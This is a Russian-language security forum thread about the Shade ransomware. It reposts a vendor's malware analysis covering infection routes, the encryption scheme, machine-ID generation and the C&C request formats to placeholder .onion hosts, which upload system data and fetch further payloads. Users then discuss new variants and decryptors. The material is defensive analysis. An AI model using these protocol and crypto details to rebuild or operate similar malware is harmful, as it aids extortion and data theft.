Shade: Описание и вариации

Тема в разделе "Вирусы-шифровальщики", создана пользователем Severnyj, 1 сен 2015.

  1. Severnyj
    Оффлайн

    Severnyj Команда форума Супер-Модератор Ассоциация VN/VIP

    Сообщения:
    7.840
    Симпатии:
    8.594
    Один из наиболее часто встречающихся сегодня в России троянцев-шифровальщиков не только несет опасность сам по себе, но и загружает в систему жертвы ряд других зловредов.


    Shade попадает на компьютер жертвы двумя способами: либо через спам-рассылки, либо с помощью эксплойтов. В первом случае жертва получает письмо с вредоносным вложением, попытка открыть которое приводит к заражению системы. Имя файла меняется с каждой новой волной рассылки.

    Во втором случае вредоносный код появляется в системе после посещения жертвой скомпрометированного веб-сайта. Это может быть как сайт, специально созданный злоумышленниками, так и легальный, но взломанный ресурс. Вредоносный код на сайте эксплуатирует уязвимость в браузере или его плагинах, после чего в систему тайно устанавливается программа-вымогатель.

    После попадания на компьютер жертвы Shade начинает шифровать файлы и добавлять к ним расширения .xtbl и .ytbl. Но на этом действие троянца не прекращается. Помимо своей прямой основной работы Shade скачивает и устанавливает в систему пользователя другие вредоносные программы нескольких различных семейств, например программу подбора паролей к веб-сайтам. Еще одно вредоносное ПО, загружаемое шифровальщиком, известно как Trojan-Downloader.Win32.Zemot – этот зловред в свою очередь может устанавливать на компьютер жертвы известный банковский троянец ZeuS.

    [​IMG]

    В случае обнаружения шифровальщика Shade (либо результатов его работы — файлов с расширениями .xtbl, .ytbl) настоятельно рекомендуется провести полную антивирусную проверку компьютера. В противном случае система с большой долей вероятности останется заражена вредоносными программами, закаченными троянцем.

    «Киберпреступники часто атакуют компьютеры с помощью программ-шифровальщиков, пользуясь тем, что многие пользователи до сих пор даже не знают о такой угрозе. Программа проникает в систему незаметно для жертвы: в момент заражения визуально ничего не меняется, файлы же зашифровываются в фоновом режиме. Чтобы предотвратить потерю ценной информации, создавайте резервные копии, не храните данные только в одном месте. Если же вы все-таки стали жертвой троянца-шифровальщика, не стоит идти на поводу у мошенников и действовать по предлагаемой ими инструкции, а лучше сразу обращаться с заявлением в правоохранительные органы», — рекомендует Федор Синицын, антивирусный аналитик «Лаборатории Касперского».

    Чтобы защитить компьютер от программ-шифровальщиков, следует соблюдать следующие правила безопасности:

    • не открывать почтовые вложения от неизвестных отправителей;
    • своевременно обновлять антивирусные базы, операционную систему и другие программы;
    • регулярно создавать резервные копии файлов и хранить их вне компьютера.
    Источник
     
    Kиpилл, orderman, Dragokas и ещё 1-му нравится это.
  2. mike 1
    Онлайн

    mike 1 Активный пользователь

    Сообщения:
    2.467
    Симпатии:
    861
    Мне кажется есть еще 3 способ проникновения. Через Adware он тоже вроде проникает на компьютер жертвы.
     
  3. mike 1
    Онлайн

    mike 1 Активный пользователь

    Сообщения:
    2.467
    Симпатии:
    861
    Шифровальщик Shade: двойная угроза
    Семейство троянцев-вымогателей, шифрующих файлы и добавляющих к ним расширения «.xtbl» и «.ytbl», появилось в конце 2014 – начале 2015 года и довольно быстро заняло устойчивую позицию в тройке наиболее распространенных в России шифровальщиков (наравне с Trojan-Ransom.Win32.Cryakl и Trojan-Ransom.BAT.Scatter). По классификации «Лаборатории Касперского» эта угроза получила вердикт Trojan-Ransom.Win32.Shade. «Авторское» название данного шифровальщика неизвестно; другие антивирусные компании детектируют его под именами Trojan.Encoder.858, Ransom:Win32/Troldesh.

    Эволюции троянца практически не наблюдается: меняются лишь формат имени зашифрованного файла, адреса C&C и набор ключей RSA.

    Нам известны два основных способа доставки данного зловреда на компьютер жертвы – спам-рассылки и эксплойт-киты (в частности, Nuclear EK).

    В первом случае жертва получает письмо, в которое вложен исполняемый вредоносный файл. Заражение системы происходит после попытки открыть вложение. При распространении Trojan-Ransom.Win32.Shade использовались следующие имена файлов:

    • doc_dlea podpisi.com
    • doc_dlea podpisi.rar
    • documenti_589965465_documenti.com
    • documenti_589965465_documenti.rar
    • documenti_589965465_doc.scr
    • doc_dlea podpisi.rar
    • не подтвержден 308853.scr
    • documenti dlea podpisi 05.08.2015.scr.exe
    • akt sverki za 17082015.scr
    Отметим, что имя файла меняется при каждой волне рассылки, и возможные варианты не ограничиваются перечисленными выше.

    Второй способ распространения (эксплойт-кит) более опасен, поскольку заражение происходит без участия пользователя, когда жертва посещает скомпрометированный веб-сайт. Это может быть как сайт злоумышленников, так и вполне легальный, но взломанный ресурс. Чаще всего пользователь не знает, что сайт представляет собой какую-то опасность. Вредоносный код на сайте эксплуатирует уязвимость в браузере или его плагинах, после чего в скрытном режиме в систему устанавливается целевой троянец. В этом случае, в отличие от спам-письма, от жертвы даже не требуется запускать исполняемый файл.

    После того как Trojan-Ransom.Win32.Shade попал в систему, он соединяется с C&C, располагающимся в сети Tor, рапортует о заражении и запрашивает открытый ключ RSA-3072, который впоследствии использует при шифровании файлов (как именно, рассмотрим ниже). Если вдруг соединение не удалось установить, зловред выбирает один из 100 открытых ключей, содержащихся в его теле как раз для такого случая.

    Затем троянец приступает к шифрованию файлов. При поиске объектов шифрования он пользуется статическим списком расширений, представленным на скриншоте.

    crypto_shade_ru_1.png

    Когда шифрование завершено, на рабочий стол устанавливается устрашающая картинка:

    Требования выкупа зловред оставляет в файлах README1.txt, …, README10.txt. Их содержимое всегда имеет один и тот же вид:

    crypto_shade_ru_3.png

    Однако, в отличие от большинства других шифровальщиков, на этом Trojan-Ransom.Win32.Shade не останавливается. Он не завершает свой процесс, а запускает бесконечный цикл, в котором запрашивает от C&C список адресов вредоносного ПО, а затем скачивает и устанавливает это ПО в систему – такой функционал характерен для ботов-загрузчиков. Нами были выявлены факты скачивания представителей семейств:

    • Trojan.Win32.CMSBrute (о нём подробнее мы расскажем ниже).
    • Trojan.Win32.Muref
    • Trojan.Win32.Kovter
    • Trojan-Downloader.Win32.Zemot
    Код цикла скачивания и ожидания:

    crypto_shade_ru_4.png

    В связи с этим очень важно провести полную антивирусную проверку компьютера в случае обнаружения шифровальщика Shade (либо результатов его работы – файлов с расширениями .xtbl, .ytbl). Если не провести лечение, высока вероятность того, что система останется заражена несколькими различными вредоносными программами, скачиваемыми данным шифровальщиком.

    Общие черты троянцев семейства Shade


    • Написан на C++ с применением STL и собственных классов.
    • Статически слинкован с клиентом Tor.
    • Использует библиотеки boost (threads), curl, OpenSSL.
    • В каждый сэмпл зашит адрес одного сервера C&C, всего в разных образцах были найдены адреса 10 C&C серверов, 8 из которых активны в настоящее время. Все серверы расположены в сети Tor.
    • Все строки (вместе с именами импортируемых функций) зашифрованы алгоритмом AES, расшифровываются при старте программы, после чего происходит динамическое заполнение таблицы импорта.
    • Перед установкой своих обоев сохраняет старые обои в реестре.
    • Обычно упакован UPX и дополнительным упаковщиком, в распакованном виде имеет размер 1817 КБ.
    • На зараженном компьютере создает 10 одинаковых файлов README1.txt, … README10.txt с требованиями выкупа на русском и английском языках.
    • Для шифрования содержимого каждого файла и имени каждого файла генерируется уникальный 256-битный ключ AES, шифрование осуществляется в режиме CBC с нулевым начальным вектором.
    • Содержит 100 публичных ключей RSA-3072 с открытой экспонентой 65537 (всего в разных сэмплах было обнаружено 300 различных публичных ключей).
    • Имеет функционал скачивания и запуска вредоносного ПО.
    Криптографическая схема.
    Генерация id зараженного компьютера



    • Троянец получает имя компьютера (comp_name) с помощью API-функции GetComputerName и число процессоров (num_cpu) с помощью API-функции GetSystemInfo;
    • на основе серийного номера системного тома вычисляет 32-битную константу и конвертирует в hex-строку (vol_const);
    • получает данные о версии ОС (os_version), разделенные символом “;” (например, “5;1;2600;1;Service Pack 3”);
    • формирует строку comp_namenum_cpuvol_constos_version;
    • вычисляет MD5 от этой строки;
    • конвертирует MD5-хэш в hex-строку и берет из нее первые 20 символов. Полученный результат используется в качестве id компьютера.
    Получение ключевых данных


    После генерации id осуществляется попытка подключиться с C&C серверу, находящемуся в сети Tor, отправить ему id компьютера и в ответ получить публичный RSA-ключ. В случае неуспеха выбирается один из 100 зашитых в троянце публичных RSA-ключей.


    Шифрование файлов

    Для шифрования файлов применяется алгоритм AES-256 в режиме CBC. Для каждого кодируемого файла генерируется два случайных 256-битных ключа AES: один используется для шифрования содержимого файла, второй – для шифрования имени файла. Данные ключи помещаются в служебную структуру key_data, которая сама шифруется выбранным ключом RSA (занимает 384 байта после зашифрования) и помещается в конец кодируемого файла:

    crypto_shade_ru_5.png

    В синтаксисе языка C данную структуру можно записать следующим образом:

    crypto_shade_ru_6.png

    Троянец пытается переименовать закодированный файл, выбирая в качестве нового имени результат вычисления Base64(AES_encrypt(оригинальное имя файла)).xtbl (например,ArSxrr+acw970LFQw.xtbl), а в случае неуспеха просто дописывает к оригинальному имени файла расширение .ytbl. В более поздних версиях перед расширением .xtbl стал приписываться id зараженного компьютера, например: ArSxrr+acw970LFQw.043C17E72A1E91C6AE29.xtbl.


    Коммуникация с командным сервером
    В теле троянца содержится адрес одного сервера C&C. Сами серверы находятся в сети Tor, коммуникация с ними осуществляется с использованием статически прилинкованного к троянцу клиента Tor.

    Сэмпл отправляет следующие запросы на C&C сервер:

    1. Запрос нового публичного ключа RSA:
      GET http://<server>.onion/reg.php?i=ID&b=build&v=version&ss=stage
      ID – идентификатор зараженного компьютера;
      build – идентификатор конкретного сэмпла зловреда;
      version – версия зловреда, были встречены версии 1 и 2;
      stage обозначает этап шифрования – запрос нового публичного ключа RSA или сообщение о завершении шифрования файлов.

    2. Сообщение об ошибке:
      GET http://<server>.onion/err.php?i=ID&b=build&v=version&err=error
      error – base64-закодированное сообщение о произошедшей при шифровании ошибке.

    3. Сводка о текущей стадии работы шифровальщика:
      GET http://<server>.onion/prog.php?i=ID&b=build&v=version&ss=stage&c=count&f=finish
      count – текущее количество зашифрованных файлов;
      finish – флаг окончания шифрования.

    4. Информация о системе:
      POST http://<server>.onion/sys.php?i=ID&b=build&v=version&ss=stage&c=count&k=key_number&si=info
      key_number – номер выбранного ключа RSA (в случае, если ключ не был получен от сервера, а был выбран из содержащихся в теле зловерда);
      info – информация, полученная с зараженного компьютера:
      • Имя компьютера
      • Имя пользователя
      • IP-адрес
      • Домен компьютера
      • Список логических дисков
      • Версия ОС Windows
      • Список установленного ПО
    5. Запрос списка URL-адресов, с которых требуется скачать и запустить дополнительное вредоносное ПО:
      GET http://<server>.onion/cmd.php?i=ID&b=build&v=version
    Распространение шифровальщика

    Партнерская программа
    Код, который пользователям предлагается отправить по электронной почте злоумышленникам, может иметь вид ID|0 в случае, если публичный ключ был получен с C&C сервера, илиID|key_number|build|version в случае, если был выбран один из зашитых в сэмпл публичных ключей RSA с номером key_number. ID обозначает идентификатор зараженного компьютера, а два числаbuild и version обозначают ID конкретного сэмпла и версию шифровальщика соответственно.

    При анализе образцов зловреда нами были обнаружены различные комбинации значений build, адресов почты для связи пользователей со злоумышленниками и адресов C&C. Разным значениям build соответствуют разные почтовые адреса, при этом один и тот же C&C может обслуживать несколько разных сэмплов:

    m2g6DXz.png

    Мы зафиксировали распространение разных сэмплов двух версий шифровальщика. При этом каждому конкретному образцу одной и той же версии зловреда соответствовала уникальная комбинация build-email (ID конкретного сэмпла и адреса для связи со злоумышленниками).

    Хотя объявлений о партнерстве найдено не было, на основе этих данных мы можем предположить, что распространение троянца и прием выкупа осуществляются через партнерскую сеть. Вероятно, ID сэмплов (значение build) и разные почтовые адреса соответствуют различным партнерам-распространителям данного вредоносного ПО.

    География


    crypto_shade_ru_7.png

    0an5PWM.png


    Загружаемое вредоносное ПО: троянец-брутфорсер паролей к веб-сайтам

    Среди вредоносных программ, которые скачивает Trojan-Ransom.Win32.Shade, встречается троянец-брутфорсер паролей к web-сайтам. По своей внутренней организации брутфорсер очень напоминает самого шифровальщика – наиболее вероятно, он является проектом тех же авторов. Скачиваемый зловред получил вердикт Trojan.Win32.CMSBrute.

    Общие черты семейства CMSBrute


    • Написан на C++ с применением STL и собственных классов.
    • Статически слинкован с клиентом Tor.
    • Использует библиотеки boost (threads), curl, OpenSSL.
    • В каждый сэмпл зашит адрес одного сервера C&C, всего в разных сэмплах были найдены адреса трех C&C серверов. Все C&C находятся в сети Tor, они отличаются от адресов, встреченных в образцах Trojan-Ransom.Win32.Shade.
    • Все строки (вместе с именами импортируемых функций) зашифрованы алгоритмом AES, расшифровываются при старте программы, после чего происходит динамическое заполнение таблицы импорта.
    • Обычно упакован UPX, в распакованном виде имеет размер 2080-2083 КБ.
    • Копирует себя в одну из директорий диска C с именем csrss.exe.
    • Скачивает дополнительные dll-плагины. Плагины содержат код для определения установленной системы управления контентом (CMS) на атакуемом веб-сайте, поиска админ-панели и подбора паролей. Были обнаружены плагины, поддерживающие сайты на основе Joomla, WordPress и DataLife Engine.
    Коммуникация с командным сервером


    В каждом образце Trojan.Win32.CMSBrute содержится адрес одного сервера C&C. Серверы находятся в сети Tor, коммуникация с ними осуществляется с использованием статически прилинкованного к троянцу клиента Tor.

    Сэмпл отправляет следующие запросы на C&C сервер:

    1. Регистрация нового бота:
      GET http://<server>.onion/reg.php?n=ID&b=build&v=version&sf=stage
      ID – идентификатор зараженного компьютера; вычисляется по алгоритму, незначительно отличающемуся от такового в шифровальщике Shade;
      build – идентификатор конкретного сэмпла зловреда; был встречен только build 1;
      version – версия зловреда; была встречена только версия 1;
      stage – этап работы троянца.

    2. Запрос на получение URL-адресов для скачивания или обновления плагинов-dll
      GET http://<server>.onion/upd.php?n=ID&b=build&v=version&p=plugins

    3. Запрос задания на определение CMS на сайте и проверки логинов и паролей:
      GET http://<server>.onion/task.php?n=ID&b=build&v=version&p=plugins
      plugins – версии установленных плагинов-dll.
      Ответ от сервера приходит в формате json и содержит адреса атакуемых сайтов и словарь для подбора паролей.

    4. Отправка отчета о брутфорсе:
      POST http://<server>.onion/rep.php?n=ID&b=build&v=version&rep=report
      report – json-строка, содержащая отчет о найденных СMS на веб-сайте и подобранных логинах и паролях от админ-панели.

    Рекомендации


    В случае Trojan-Ransom.Win32.Shade актуальны все ставшие уже традиционными советы по противодействию шифровальщикам. Подробные инструкции можно найти по адресам:
    Защита от вредоносной программы Trojan-Ransom.Win32.Shade
    Рекомендации по защите компьютера от программ-шифровальщиков

    Если компьютер уже пострадал от данного троянца, чрезвычайно важно провести полное сканирование и лечение антивирусным продуктом, т.к. Trojan-Ransom.Win32.Shade скачивает и устанавливает в скомпрометированную систему вредоносное ПО нескольких различных семейств, указанных в начале статьи.

    Источник: Шифровальщик Shade: двойная угроза
     
    Последнее редактирование модератором: 10 июл 2016
    Dragokas, Охотник, orderman и ещё 1-му нравится это.
  4. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.220
    Симпатии:
    8.894
    Наделавший немало бед в прошлом году Shade похоже получил новую итерацию.

    Windows10 Ransomware шифрует файлы пользователей, добавляя расширение .windows10, а затем требует выкуп за дешифровку.
    Ориентирован, главным образом, на русскоязычных пользователей, т.к. англоязычный текст добавлен вторым на случай, если пострадавшие не знают русского языка.
    Также, как у прародителя Shade пронумерованные записки о выкупе README1.txt — README10.txt создаются в каждой папке, где есть зашифрованные файлы, + на Рабочем столе и в корневых директориях всех дисков.
    ..далее инструкции по установке браузера Тор и выход на сайт оплаты...
     
    Охотник и Kиpилл нравится это.
  5. mike 1
    Онлайн

    mike 1 Активный пользователь

    Сообщения:
    2.467
    Симпатии:
    861
    Не совсем так. Эти файлы создаются в корне каждого диска, а также на рабочем столе каждой учетной записи.

    На сайте только указаны резервные адреса для обратной связи на случай, если основную почту злодеев прикроют.
     
    SNS-amigo нравится это.
  6. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.220
    Симпатии:
    8.894
    mike 1, в корне диска и на столе - это было у оригинального Shade.
    Чтобы написать, что так есть и у новой итерации, мне нужно было подтверждение.

    thyrex, mike 1, спасибо за замечания. Дополняйте топик, если будут новые данные.
     
    Охотник нравится это.
  7. thyrex
    Оффлайн

    thyrex Команда форума Супер-Модератор Ассоциация VN/VIP

    Сообщения:
    2.469
    Симпатии:
    3.097
    Это Shade. Держите подтверждение.

    Вообще странно, что остались без Вашего внимания другие модификации, например, с расширениями .breaking_bad, .da_vinci_code
    Это же касается и адресов для связи с вымогателями.
     

    Вложения:

    • FRST (2).txt
      Размер файла:
      72,1 КБ
      Просмотров:
      9
    Последнее редактирование: 3 июл 2016
    SNS-amigo нравится это.
  8. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.220
    Симпатии:
    8.894
    thyrex, по Shade топик я не заполнял вообще. :Biggrin:

    Увидел ридмишки в логе, добавил в пост про итерацию Windows10.
     
  9. mike 1
    Онлайн

    mike 1 Активный пользователь

    Сообщения:
    2.467
    Симпатии:
    861
    SNS-amigo нравится это.
  10. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.220
    Симпатии:
    8.894
    mike 1, есть список, когда, какая версия была выпущена?
     
  11. thyrex
    Оффлайн

    thyrex Команда форума Супер-Модератор Ассоциация VN/VIP

    Сообщения:
    2.469
    Симпатии:
    3.097
    Эта версия 1 июля была случайно :) выложена Утилиты
    2 июля в доступе ее уже не было
     
    SNS-amigo нравится это.
  12. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.220
    Симпатии:
    8.894
    thyrex, куда ж она делась? :Biggrin: Хорошо работает.
    Я попробовал и расшифровал папку с котятами - была зашифрована в декабре 2015. Хозяйка дождалась.
    Майку и разрабам респект! Счас отправлю по почте. Пушистик уже, наверное, большой стал.
    1ф.png 2ф.png
     
    Охотник нравится это.
  13. mike 1
    Онлайн

    mike 1 Активный пользователь

    Сообщения:
    2.467
    Симпатии:
    861
    Вот дешифратор для первых четырех модификаций. Может кому и поможет.
     

    Вложения:

    Kиpилл и SNS-amigo нравится это.
  14. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.220
    Симпатии:
    8.894
  15. mike 1
    Онлайн

    mike 1 Активный пользователь

    Сообщения:
    2.467
    Симпатии:
    861
    А я не знаю. Второй дешифратор приватный.
     
  16. Kиpилл
    Оффлайн

    Kиpилл Команда форума Администратор

    Лучший автор месяца

    Сообщения:
    12.208
    Симпатии:
    4.977
    Да,эти довольно популярны.
    Для них дешифровщик актуален?
     
  17. mike 1
    Онлайн

    mike 1 Активный пользователь

    Сообщения:
    2.467
    Симпатии:
    861
    Приватный дешифратор из 13 сообщения пробуй.
     
    Kиpилл нравится это.
  18. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.220
    Симпатии:
    8.894
    Koza Nozdri, а я выше проверил и расшифровал утилитой из поста #9.
     
    Kиpилл нравится это.
  19. Antidot
    Оффлайн

    Antidot Новый пользователь

    Сообщения:
    4
    Симпатии:
    2
    Дешифровщика пока не у кого нет ?
    Озвучивают сумму в 0,5 биткоина за файлы.
     
  20. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.220
    Симпатии:
    8.894
    Antidot, как нет - пост №9 и пост №13 - дешифровщики во вложении.
    Я в посте 12-м первым дешифровщиком расшифровал файлы.
     

Поделиться этой страницей